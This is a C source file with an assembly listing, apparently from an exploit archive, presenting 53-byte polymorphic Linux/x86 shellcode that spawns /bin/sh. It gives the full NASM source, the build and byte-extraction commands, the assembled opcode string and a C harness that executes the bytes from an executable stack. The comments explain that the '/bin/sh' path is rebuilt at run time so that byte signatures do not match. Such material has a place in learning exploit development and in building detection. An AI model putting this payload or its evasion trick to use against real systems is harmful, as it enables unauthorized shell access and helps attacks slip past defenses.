/*
# Title: Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)
# Date: 10-Jan-2018
# Exploit Author: Debashis Pal <debashis.pals[at]gmail.com>
# SLAE-1122
# Tested on: i686 GNU/Linux
# '//bin/sh' stored as two little-endian dwords: 0x68732f6e ("n/sh"), 0x69622f2f ("//bi")
########## polymorphic.nasm ##########
; Syntax: NASM (Intel operand order), 32-bit Linux, entered at _start with no
; caller. Builds the NUL-terminated path "//bin/sh" on the stack and issues
; syscall 11 (execve on i386) through the int 0x80 gate.
;   At the syscall: eax = 11, ebx -> "//bin/sh", ecx = 0 (second argument),
;   edx = 0 (third argument).
; The two path dwords never appear as literals in the encoding: each one is
; rebuilt at run time from a constant pair (add / sub), so a byte signature
; for the ASCII path does not match this listing. The register state at
; int 0x80 is the same as for an unencoded variant.
global _start
section .text
_start:
add esi, 0x30 ; filler: esi is reloaded below before it is ever read
xor ecx, ecx ; ecx = 0
mul ecx ; edx:eax = eax * 0, so eax and edx are zeroed as well
; Each store below lands under esp and esp is lowered only afterwards, so the
; slot sits outside the live stack for the instruction in between.
mov dword [esp-4], ecx ; four zero bytes: the terminator that follows the path
sub esp, 4
mov esi, 0x353ffc3b
add esi, 0x33333333 ; esi = 0x68732f6e, bytes "n/sh" in memory order
mov dword [esp-4], esi
mov edi, 0xada67373
sub edi, 0x44444444 ; edi = 0x69622f2f, bytes "//bi" in memory order
mov dword [esp-8], edi
sub esp, 8 ; esp -> "//bin/sh" followed by the zero dword
mov ebx, esp ; ebx = address of the path string
mov al, 11 ; only al is written; eax = 11 because mul cleared the upper bytes
int 0x80 ; nothing follows this instruction in the listing
####################################
$ nasm -f elf polymorphic.nasm
$ ld -o polymorphic polymorphic.o
$ objdump -d ./polymorphic|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80"
$ gcc -fno-stack-protector -z execstack shellcode.c -o x86PolymorphicShellcodelinux32
$ ./x86PolymorphicShellcodelinux32
Shellcode Length: 53
$ uname -a
Linux kali 4.4.0-kali1-686 #1 SMP Debian 4.4.2-3kali1 (2016-02-23) i686 GNU/Linux
$
####################################
*/
#include<stdio.h>
#include<string.h>
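/*
 * Assembled bytes of polymorphic.nasm from the header comment: 53 bytes, one
 * \x escape per byte, none of them zero. The compiler appends the usual
 * string terminator, so sizeof(code) is 54.
 *
 * Every byte needs its backslash. Without it each escape is three characters
 * of plain ASCII text, and the length printed by main() no longer matches the
 * 53 shown in the transcript.
 */
unsigned char code[] =
"\x83\xc6\x30\x31\xc9\xf7\xe1\x89\x4c\x24\xfc\x83\xec\x04\xbe\x3b\xfc\x3f\x35"
"\x81\xc6\x33\x33\x33\x33\x89\x74\x24\xfc\xbf\x73\x73\xa6\xad\x81\xef\x44\x44"
"\x44\x44\x89\x7c\x24\xf8\x83\xec\x08\x89\xe3\xb0\x0b\xcd\x80";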
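/*
 * Test harness: print the payload length, then call the bytes in `code` as a
 * function.
 *
 * `code` is an ordinary writable array, so the call depends on its page being
 * executable; the build line in the header passes `-z execstack` for that.
 * Where non-executable data is enforced, the call is expected to fault rather
 * than run the bytes.
 *
 * Returns 0, which is reached only if control comes back from the payload.
 */
int main(void)
{
    /*
     * strlen() stops at the first zero byte, so it reports the payload size
     * only because the payload contains none. The cast matches strlen()'s
     * parameter type and %zu matches its size_t result.
     */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Reinterpret the data array as a function taking no arguments. */
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}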